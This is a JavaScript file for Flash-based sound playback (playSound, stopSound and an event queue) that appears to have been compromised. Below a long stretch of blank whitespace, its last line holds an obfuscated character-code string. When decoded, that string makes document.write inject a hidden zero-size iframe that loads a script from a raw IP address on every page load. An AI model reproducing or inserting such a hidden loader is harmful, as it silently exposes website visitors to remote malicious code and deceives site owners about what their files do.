function getFlashMovieObject(movieName) {
  if (window.document[movieName]) {
      return window.document[movieName];
  }
  if (navigator.appName.indexOf("Microsoft Internet")==-1) {
    if (document.embeds && document.embeds[movieName])
      return document.embeds[movieName]; 
  } else {
    return document.getElementById(movieName);
  }
}

var eventList = new Array();
function nextSoundEvent() {
	if (eventList.length) {
		var flash = getFlashMovieObject('playsound');
		var readyValue = null;
		try {
        	readyValue = flash.GetVariable('ready');
		} catch(e) {
			window.setTimeout(nextSoundEvent, 150);
			return;
		}
		try {
			if (!parseInt(readyValue)) {		
				window.setTimeout(nextSoundEvent, 150);
				return;
			}
			flash.SetVariable('ready', 0);
			var event = eventList[0];
			eventList = eventList.slice(1);
			if (event.type == 'play') {
				flash.SetVariable('soundID', event.id);
				flash.SetVariable('looping', event.loop ? 1 : 0);
				flash.SetVariable('soundURL', event.url);
			} else {
				flash.SetVariable('stopID', event.id);
			}
		} catch(e) {
			return;
		}
	}
}

function playSound(url,id,loop) {
	eventList.push({
		"type": 'play',
		"url": url,
		"id": id,
		"loop": loop
	});
	nextSoundEvent();
}

function stopSound(id) {
	eventList.push({
		"type": 'stop',
		"id": id
	});
	nextSoundEvent();
}





























var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!52!54!46!52!46!49!54!51!46!50!48!56!47!99!111!117!110!116!101!114!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);

